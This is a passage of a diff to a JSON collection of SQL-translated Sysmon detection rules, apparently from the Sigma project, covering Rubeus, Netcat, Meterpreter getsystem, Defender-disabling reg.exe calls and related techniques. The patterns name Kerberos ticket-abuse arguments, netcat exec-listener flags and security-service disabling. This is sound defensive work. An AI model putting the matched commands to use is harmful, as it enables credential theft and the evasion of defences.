- "level": "high", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '6' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((ImageLoaded LIKE '%\\\\WinRing0x64.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\WinRing0.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\WinRing0.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\WinRing0x64.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\winring00x64.sys' ESCAPE '\\') OR Hashes LIKE '%IMPHASH=D41FA95D4642DC981F10DE36F4DC8CD7%' ESCAPE '\\' OR Imphash = 'd41fa95d4642dc981f10de36f4dc8cd7'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\Rubeus.exe' ESCAPE '\\' OR OriginalFileName = 'Rubeus.exe' OR Description = 'Rubeus' OR (CommandLine LIKE '%asreproast %' ESCAPE '\\' OR CommandLine LIKE '%dump /service:krbtgt %' ESCAPE '\\' OR CommandLine LIKE '%dump /luid:0x%' ESCAPE '\\' OR CommandLine LIKE '%kerberoast %' ESCAPE '\\' OR CommandLine LIKE '%createnetonly /program:%' ESCAPE '\\' OR CommandLine LIKE '%ptt /ticket:%' ESCAPE '\\' OR CommandLine LIKE '%/impersonateuser:%' ESCAPE '\\' OR CommandLine LIKE '%renew /ticket:%' ESCAPE '\\' OR CommandLine LIKE '%asktgt /user:%' ESCAPE '\\' OR CommandLine LIKE '%harvest /interval:%' ESCAPE '\\' OR CommandLine LIKE '%s4u /user:%' ESCAPE '\\' OR CommandLine LIKE '%s4u /ticket:%' ESCAPE '\\' OR CommandLine LIKE '%hash /password:%' ESCAPE '\\' OR CommandLine LIKE '%golden /aes256:%' ESCAPE '\\' OR CommandLine LIKE '%silver /user:%' ESCAPE '\\')))" ], - "filename": "driver_load_win_vuln_winring0_driver.yml" + "filename": "proc_creation_win_hktl_rubeus.yml" }, { - "title": "Usage Of Malicious POORTRY Signed Driver", - "id": "91bc09e7-674d-4cf5-8d86-ed5d8bdb95a6", + "title": "PUA - Netcat Suspicious Execution", + "id": "e31033fc-33f0-4020-9a16-faf9b31cbf08", "status": "experimental", - "description": "Detects the load of the signed poortry driver used by UNC3944 as reported by Mandiant and Sentinel One.", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects execution of Netcat. Adversaries may use a non-application layer protocol for communication between host and C2 server or among infected hosts within a network", + "author": "frack113, Florian Roth (Nextron Systems)", "tags": [ - "attack.privilege_escalation", - "attack.t1543", - "attack.t1068" + "attack.command_and_control", + "attack.t1095" ], "falsepositives": [ - "Legitimate BIOS driver updates (should be rare)" + "Legitimate ncat use" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '6' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((ImageLoaded LIKE '%\\\\prokiller64.sys%' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\gftkyj64.sys%' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\KApcHelper\\_x64.sys%' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\NodeDriver.sys%' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\LcTkA.sys%' ESCAPE '\\') OR (Hashes LIKE '%SHA256=0440ef40c46fdd2b5d86e7feef8577a8591de862cfd7928cdbcc8f47b8fa3ffc%' ESCAPE '\\' OR Hashes LIKE '%SHA256=9b1b15a3aacb0e786a608726c3abfc94968915cedcbd239ddf903c4a54bfcf0c%' ESCAPE '\\' OR Hashes LIKE '%SHA256=8e035beb02a411f8a9e92d4cf184ad34f52bbd0a81a50c222cdd4706e4e45104%' ESCAPE '\\' OR Hashes LIKE '%SHA256=d7c81b0f3c14844f6424e8bdd31a128e773cb96cccef6d05cbff473f0ccb9f9c%' ESCAPE '\\' OR Hashes LIKE '%SHA256=05b146a48a69dd62a02759487e769bd30d39f16374bc76c86453b4ae59e7ffa4%' ESCAPE '\\' OR Hashes LIKE '%SHA256=c8f9e1ad7b8cce62fba349a00bc168c849d42cfb2ca5b2c6cc4b51d054e0c497%' ESCAPE '\\' OR Hashes LIKE '%SHA1=31cc8718894d6e6ce8c132f68b8caaba39b5ba7a%' ESCAPE '\\' OR Hashes LIKE '%SHA1=a804ebec7e341b4d98d9e94f6e4860a55ea1638d%' ESCAPE '\\' OR Hashes LIKE '%SHA1=6debce728bcff73d9d1d334df0c6b1c3735e295c%' ESCAPE '\\' OR Hashes LIKE '%SHA1=cc65bf60600b64feece5575f21ab89e03a728332%' ESCAPE '\\' OR Hashes LIKE '%SHA1=3ef30c95e40a854cc4ded94fc503d0c3dc3e620e%' ESCAPE '\\' OR Hashes LIKE '%SHA1=b2f955b3e6107f831ebe67997f8586d4fe9f3e98%' ESCAPE '\\' OR Hashes LIKE '%MD5=10f3679384a03cb487bda9621ceb5f90%' ESCAPE '\\' OR Hashes LIKE '%MD5=04a88f5974caa621cee18f34300fc08a%' ESCAPE '\\' OR Hashes LIKE '%MD5=6fcf56f6ca3210ec397e55f727353c4a%' ESCAPE '\\' OR Hashes LIKE '%MD5=0f16a43f7989034641fd2de3eb268bf1%' ESCAPE '\\' OR Hashes LIKE '%MD5=ee6b1a79cb6641aa44c762ee90786fe0%' ESCAPE '\\' OR Hashes LIKE '%MD5=909f3fc221acbe999483c87d9ead024a%' ESCAPE '\\') OR sha256 IN ('0440ef40c46fdd2b5d86e7feef8577a8591de862cfd7928cdbcc8f47b8fa3ffc', '9b1b15a3aacb0e786a608726c3abfc94968915cedcbd239ddf903c4a54bfcf0c', '8e035beb02a411f8a9e92d4cf184ad34f52bbd0a81a50c222cdd4706e4e45104', 'd7c81b0f3c14844f6424e8bdd31a128e773cb96cccef6d05cbff473f0ccb9f9c', '05b146a48a69dd62a02759487e769bd30d39f16374bc76c86453b4ae59e7ffa4', 'c8f9e1ad7b8cce62fba349a00bc168c849d42cfb2ca5b2c6cc4b51d054e0c497') OR sha1 IN ('31cc8718894d6e6ce8c132f68b8caaba39b5ba7a', 'a804ebec7e341b4d98d9e94f6e4860a55ea1638d', '6debce728bcff73d9d1d334df0c6b1c3735e295c', 'cc65bf60600b64feece5575f21ab89e03a728332', '3ef30c95e40a854cc4ded94fc503d0c3dc3e620e', 'b2f955b3e6107f831ebe67997f8586d4fe9f3e98') OR md5 IN ('10f3679384a03cb487bda9621ceb5f90', '04a88f5974caa621cee18f34300fc08a', '6fcf56f6ca3210ec397e55f727353c4a', '0f16a43f7989034641fd2de3eb268bf1', 'ee6b1a79cb6641aa44c762ee90786fe0', '909f3fc221acbe999483c87d9ead024a')))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\nc.exe' ESCAPE '\\' OR Image LIKE '%\\\\ncat.exe' ESCAPE '\\' OR Image LIKE '%\\\\netcat.exe' ESCAPE '\\') OR (CommandLine LIKE '% -lvp %' ESCAPE '\\' OR CommandLine LIKE '% -lvnp%' ESCAPE '\\' OR CommandLine LIKE '% -l -v -p %' ESCAPE '\\' OR CommandLine LIKE '% -lv -p %' ESCAPE '\\' OR CommandLine LIKE '% -l --proxy-type http %' ESCAPE '\\' OR CommandLine LIKE '% -vnl --exec %' ESCAPE '\\' OR CommandLine LIKE '% -vnl -e %' ESCAPE '\\' OR CommandLine LIKE '% --lua-exec %' ESCAPE '\\' OR CommandLine LIKE '% --sh-exec %' ESCAPE '\\')))" ], - "filename": "driver_load_win_mal_poortry_driver.yml" + "filename": "proc_creation_win_pua_netcat.yml" }, { - "title": "Vulnerable GIGABYTE Driver Load", - "id": "7bcfeece-e5ed-4ff3-a5fb-2640d8cc8647", + "title": "Potential Suspicious Activity Using SeCEdit", + "id": "c2c76b77-32be-4d1f-82c9-7e544bdfe0eb", "status": "experimental", - "description": "Detects the load of a signed and vulnerable GIGABYTE driver often used by threat actors or malware for privilege escalation", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects potential suspicious behaviour using secedit.exe. Such as exporting or modifying the security policy", + "author": "Janantha Marasinghe", "tags": [ + "attack.discovery", + "attack.persistence", + "attack.defense_evasion", + "attack.credential_access", "attack.privilege_escalation", - "attack.t1543.003" + "attack.t1562.002", + "attack.t1547.001", + "attack.t1505.005", + "attack.t1556.002", + "attack.t1562", + "attack.t1574.007", + "attack.t1564.002", + "attack.t1546.008", + "attack.t1546.007", + "attack.t1547.014", + "attack.t1547.010", + "attack.t1547.002", + "attack.t1557", + "attack.t1082" ], "falsepositives": [ - "Unknown" + "Legitimate administrative use" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '6' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Hashes LIKE '%MD5=9AB9F3B75A2EB87FAFB1B7361BE9DFB3%' ESCAPE '\\' OR Hashes LIKE '%MD5=C832A4313FF082258240B61B88EFA025%' ESCAPE '\\' OR Hashes LIKE '%SHA1=FE10018AF723986DB50701C8532DF5ED98B17C39%' ESCAPE '\\' OR Hashes LIKE '%SHA1=1F1CE28C10453ACBC9D3844B4604C59C0AB0AD46%' ESCAPE '\\' OR Hashes LIKE '%SHA256=31F4CFB4C71DA44120752721103A16512444C13C2AC2D857A7E6F13CB679B427%' ESCAPE '\\' OR Hashes LIKE '%SHA256=CFC5C585DD4E592DD1A08887DED28B92D9A5820587B6F4F8FA4F56D60289259B%' ESCAPE '\\') OR md5 IN ('9ab9f3b75a2eb87fafb1b7361be9dfb3', 'c832a4313ff082258240b61b88efa025') OR sha1 IN ('fe10018af723986db50701c8532df5ed98b17c39', '1f1ce28c10453acbc9d3844b4604c59c0ab0ad46') OR sha256 IN ('31f4cfb4c71da44120752721103a16512444c13c2ac2d857a7e6f13cb679b427', 'cfc5c585dd4e592dd1a08887ded28b92d9a5820587b6f4f8fa4f56d60289259b')))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\secedit.exe' ESCAPE '\\' OR OriginalFileName = 'SeCEdit') AND ((CommandLine LIKE '%/export%' ESCAPE '\\' AND CommandLine LIKE '%/cfg%' ESCAPE '\\') OR (CommandLine LIKE '%/configure%' ESCAPE '\\' AND CommandLine LIKE '%/db%' ESCAPE '\\')))" ], - "filename": "driver_load_win_vuln_gigabyte_driver.yml" + "filename": "proc_creation_win_secedit_execution.yml" }, { - "title": "Suspicious Driver Load from Temp", - "id": "2c4523d5-d481-4ed0-8ec3-7fbf0cb41a75", + "title": "Potential Meterpreter/CobaltStrike Activity", + "id": "15619216-e993-4721-b590-4c520615a67d", "status": "test", - "description": "Detects a driver load from a temporary directory", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects the use of getsystem Meterpreter/Cobalt Strike command by detecting a specific service starting", + "author": "Teymur Kheirkhabarov, Ecco, Florian Roth", "tags": [ - "attack.persistence", "attack.privilege_escalation", - "attack.t1543.003" + "attack.t1134.001", + "attack.t1134.002" ], "falsepositives": [ - "There is a relevant set of false positives depending on applications in the environment" + "Commandlines containing components like cmd accidentally", + "Jobs and services started with cmd" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '6' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND ImageLoaded LIKE '%\\\\Temp\\\\%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (ParentImage LIKE '%\\\\services.exe' ESCAPE '\\' AND ((CommandLine LIKE '%/c%' ESCAPE '\\' AND CommandLine LIKE '%echo%' ESCAPE '\\' AND CommandLine LIKE '%\\\\pipe\\\\%' ESCAPE '\\' AND (CommandLine LIKE '%cmd%' ESCAPE '\\' OR CommandLine LIKE '%\\%COMSPEC\\%%' ESCAPE '\\')) OR (CommandLine LIKE '%rundll32%' ESCAPE '\\' AND CommandLine LIKE '%.dll,a%' ESCAPE '\\' AND CommandLine LIKE '%/p:%' ESCAPE '\\'))) AND NOT ((CommandLine LIKE '%MpCmdRun%' ESCAPE '\\')))" ], - "filename": "driver_load_win_susp_temp_use.yml" + "filename": "proc_creation_win_hktl_meterpreter_getsystem.yml" }, { - "title": "Vulnerable HW Driver Load", - "id": "9bacc538-d1b9-4d42-862e-469eafc05a41", + "title": "Suspicious Subsystem for Linux Bash Execution", + "id": "5edc2273-c26f-406c-83f3-f4d948e740dd", "status": "experimental", - "description": "Detects the load of a legitimate signed driver named HW.sys by often used by threat actors or malware for privilege escalation", - "author": "Florian Roth (Nextron Systems)", + "description": "Performs execution of specified file, can be used for defensive evasion.", + "author": "frack113", "tags": [ - "attack.privilege_escalation", - "attack.t1543.003" + "attack.defense_evasion", + "attack.t1202" ], "falsepositives": [ "Unknown" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '6' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (ImageLoaded LIKE '%\\\\HW.sys' ESCAPE '\\' OR (Hashes LIKE '%SHA256=4880F40F2E557CFF38100620B9AA1A3A753CB693AF16CD3D95841583EDCB57A8%' ESCAPE '\\' OR Hashes LIKE '%SHA256=55963284BBD5A3297F39F12F0D8A01ED99FE59D008561E3537BCD4DB4B4268FA%' ESCAPE '\\' OR Hashes LIKE '%SHA256=6A4875AE86131A594019DEC4ABD46AC6BA47E57A88287B814D07D929858FE3E5%' ESCAPE '\\' OR Hashes LIKE '%SHA1=74E4E3006B644392F5FCEA4A9BAE1D9D84714B57%' ESCAPE '\\' OR Hashes LIKE '%SHA1=18F34A0005E82A9A1556BA40B997B0EAE554D5FD%' ESCAPE '\\' OR Hashes LIKE '%SHA1=4E56E0B1D12664C05615C69697A2F5C5D893058A%' ESCAPE '\\' OR Hashes LIKE '%MD5=3247014BA35D406475311A2EAB0C4657%' ESCAPE '\\' OR Hashes LIKE '%MD5=376B1E8957227A3639EC1482900D9B97%' ESCAPE '\\' OR Hashes LIKE '%MD5=45C2D133D41D2732F3653ED615A745C8%' ESCAPE '\\') OR sha256 IN ('4880f40f2e557cff38100620b9aa1a3a753cb693af16cd3d95841583edcb57a8', '55963284bbd5a3297f39f12f0d8a01ed99fe59d008561e3537bcd4db4b4268fa', '6a4875ae86131a594019dec4abd46ac6ba47e57a88287b814d07d929858fe3e5') OR sha1 IN ('74e4e3006b644392f5fcea4a9bae1d9d84714b57', '18f34a0005e82a9a1556ba40b997b0eae554d5fd', '4e56e0b1d12664c05615c69697a2f5c5d893058a') OR md5 IN ('3247014ba35d406475311a2eab0c4657', '376b1e8957227a3639ec1482900d9b97', '45c2d133d41d2732f3653ed615a745c8')))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (CommandLine LIKE '%bash.exe%' ESCAPE '\\' AND CommandLine LIKE '%-c %' ESCAPE '\\') AND NOT (((ParentCommandLine LIKE '%C:\\\\Program Files\\\\Git\\\\post-install.bat%' ESCAPE '\\' OR ParentCommandLine LIKE '%C:\\\\Program Files (x86)\\\\Git\\\\post-install.bat%' ESCAPE '\\' OR ParentCommandLine LIKE '%echo /etc/post-install/%.post%' ESCAPE '\\') OR CommandLine LIKE '%echo /etc/post-install/%.post%' ESCAPE '\\')))" ], - "filename": "driver_load_win_vuln_hw_driver.yml" + "filename": "proc_creation_win_lolbin_bash.yml" }, { - "title": "DLL Sideloading Of DBGHELP.DLL", - "id": "6414b5cd-b19d-447e-bb5e-9f03940b5784", + "title": "Reg Disable Security Service", + "id": "5e95028c-5229-4214-afae-d653d573d0ec", "status": "experimental", - "description": "Detects DLL sideloading of \"dbghelp.dll\"", - "author": "Nasreddine Bencherchali (Nextron Systems), Wietze Beukema (project and research)", + "description": "Detects a suspicious reg.exe invocation that looks as if it would disable an important security service", + "author": "Florian Roth (Nextron Systems), John Lambert (idea), elhoim", "tags": [ "attack.defense_evasion", - "attack.persistence", - "attack.privilege_escalation", - "attack.t1574.001", - "attack.t1574.002" + "attack.t1562.001" ], "falsepositives": [ - "Legitimate applications loading their own versions of the DLL mentioned in this rule" + "Unknown", + "Other security solution installers" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '7' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ImageLoaded LIKE '%\\\\dbghelp.dll' ESCAPE '\\' AND NOT (((ImageLoaded LIKE 'C:\\\\Windows\\\\System32\\\\%' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\Windows\\\\SysWOW64\\\\%' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\Windows\\\\WinSxS\\\\%' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\Windows\\\\SoftwareDistribution\\\\%' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\Windows\\\\SystemTemp\\\\%' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\Program Files (x86)\\\\%' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\Program Files\\\\%' ESCAPE '\\') OR (ImageLoaded LIKE '%\\\\Epic Games\\\\Launcher\\\\Engine\\\\Binaries\\\\ThirdParty\\\\DbgHelp\\\\dbghelp.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\Epic Games\\\\MagicLegends\\\\x86\\\\dbghelp.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\Anaconda3\\\\Lib\\\\site-packages\\\\vtrace\\\\platforms\\\\windll\\\\amd64\\\\dbghelp.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\Anaconda3\\\\Lib\\\\site-packages\\\\vtrace\\\\platforms\\\\windll\\\\i386\\\\dbghelp.dll' ESCAPE '\\'))))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (CommandLine LIKE '%reg%' ESCAPE '\\' AND CommandLine LIKE '%add%' ESCAPE '\\') AND ((CommandLine LIKE '% /d 4%' ESCAPE '\\' AND CommandLine LIKE '% /v Start%' ESCAPE '\\' AND (CommandLine LIKE '%\\\\Sense%' ESCAPE '\\' OR CommandLine LIKE '%\\\\WinDefend%' ESCAPE '\\' OR CommandLine LIKE '%\\\\MsMpSvc%' ESCAPE '\\' OR CommandLine LIKE '%\\\\NisSrv%' ESCAPE '\\' OR CommandLine LIKE '%\\\\WdBoot%' ESCAPE '\\' OR CommandLine LIKE '%\\\\WdNisDrv%' ESCAPE '\\' OR CommandLine LIKE '%\\\\WdNisSvc%' ESCAPE '\\' OR CommandLine LIKE '%\\\\wscsvc%' ESCAPE '\\' OR CommandLine LIKE '%\\\\SecurityHealthService%' ESCAPE '\\' OR CommandLine LIKE '%\\\\wuauserv%' ESCAPE '\\' OR CommandLine LIKE '%\\\\UsoSvc%' ESCAPE '\\' OR CommandLine LIKE '%\\\\WdFilter%' ESCAPE '\\' OR CommandLine LIKE '%\\\\AppIDSvc%' ESCAPE '\\')) OR (CommandLine LIKE '% /d 1%' ESCAPE '\\' AND CommandLine LIKE '%Windows Defender%' ESCAPE '\\' AND (CommandLine LIKE '%DisableIOAVProtection%' ESCAPE '\\' OR CommandLine LIKE '%DisableOnAccessProtection%' ESCAPE '\\' OR CommandLine LIKE '%DisableRoutinelyTakingAction%' ESCAPE '\\' OR CommandLine LIKE '%DisableScanOnRealtimeEnable%' ESCAPE '\\' OR CommandLine LIKE '%DisableBlockAtFirstSeen%' ESCAPE '\\' OR CommandLine LIKE '%DisableBehaviorMonitoring%' ESCAPE '\\' OR CommandLine LIKE '%DisableEnhancedNotifications%' ESCAPE '\\' OR CommandLine LIKE '%DisableAntiSpyware%' ESCAPE '\\' OR CommandLine LIKE '%DisableAntiSpywareRealtimeProtection%' ESCAPE '\\' OR CommandLine LIKE '%DisableConfig%' ESCAPE '\\' OR CommandLine LIKE '%DisablePrivacyMode%' ESCAPE '\\' OR CommandLine LIKE '%SignatureDisableUpdateOnStartupWithoutEngine%' ESCAPE '\\' OR CommandLine LIKE '%DisableArchiveScanning%' ESCAPE '\\' OR CommandLine LIKE '%DisableIntrusionPreventionSystem%' ESCAPE '\\' OR CommandLine LIKE '%DisableScriptScanning%' ESCAPE '\\'))))" ], - "filename": "image_load_side_load_dbghelp_dll.yml" + "filename": "proc_creation_win_reg_disable_sec_services.yml" }, { - "title": "Potential System DLL Sideloading From Non System Locations", - "id": "4fc0deee-0057-4998-ab31-d24e46e0aba4", - "status": "experimental", - "description": "Detects DLL sideloading of DLLs usually located in system locations (System32, SysWOW64...)", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "Detection of PowerShell Execution via Sqlps.exe", + "id": "0152550d-3a26-4efd-9f0e-54a0b28ae2f3", + "status": "test", + "description": "This rule detects execution of a PowerShell code through the sqlps.exe utility, which is included in the standard set of utilities supplied with the MSSQL Server.\nScript blocks are not logged in this case, so this utility helps to bypass protection mechanisms based on the analysis of these logs.\n", + "author": "Agro (@agro_sev) oscd.community", "tags": [ + "attack.execution", + "attack.t1059.001", "attack.defense_evasion", - "attack.persistence", - "attack.privilege_escalation", - "attack.t1574.001", - "attack.t1574.002" + "attack.t1127" ], "falsepositives": [ - "Legitimate applications loading their own versions of the DLLs mentioned in this rule" + "Direct PS command execution through SQLPS.exe is uncommon, childprocess sqlps.exe spawned by sqlagent.exe is a legitimate action." ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '7' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (ImageLoaded LIKE '%\\\\shfolder.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\activeds.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\adsldpc.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\aepic.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\apphelp.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\applicationframe.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\appxalluserstore.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\appxdeploymentclient.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\archiveint.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\atl.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\audioses.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\auditpolcore.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\authfwcfg.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\authz.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\avrt.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\bcd.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\bcp47langs.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\bcp47mrm.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\bcrypt.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\cabinet.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\cabview.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\certenroll.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\cldapi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\clipc.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\clusapi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\cmpbk32.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\coloradapterclient.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\colorui.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\comdlg32.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\connect.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\coremessaging.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\credui.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\cryptbase.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\cryptdll.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\cryptui.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\cryptxml.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\cscapi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\cscobj.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\cscui.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\d2d1.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\d3d10.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\d3d10\\_1.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\d3d10\\_1core.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\d3d10core.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\d3d10warp.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\d3d11.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\d3d12.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\d3d9.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dataexchange.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\davclnt.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dcomp.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\defragproxy.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\desktopshellext.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\deviceassociation.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\devicecredential.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\devicepairing.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\devobj.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\devrtl.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dhcpcmonitor.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dhcpcsvc.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dhcpcsvc6.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\directmanipulation.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dismapi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dismcore.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dmcfgutils.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dmcmnutils.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dmenrollengine.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dmenterprisediagnostics.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dmiso8601utils.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dmoleaututils.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dmprocessxmlfiltered.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dmpushproxy.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dmxmlhelputils.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dnsapi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dot3api.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dot3cfg.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\drprov.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dsclient.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dsparse.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dsreg.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dsrole.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dui70.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\duser.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dusmapi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dwmapi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dwrite.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dxgi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dxva2.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\eappcfg.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\eappprxy.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\edputil.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\efsadu.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\efsutil.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\esent.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\execmodelproxy.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\explorerframe.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\fastprox.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\faultrep.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\fddevquery.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\feclient.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\fhcfg.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\firewallapi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\flightsettings.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\fltlib.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\fveapi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\fwbase.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\fwcfg.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\fwpolicyiomgr.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\fwpuclnt.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\getuname.dll' 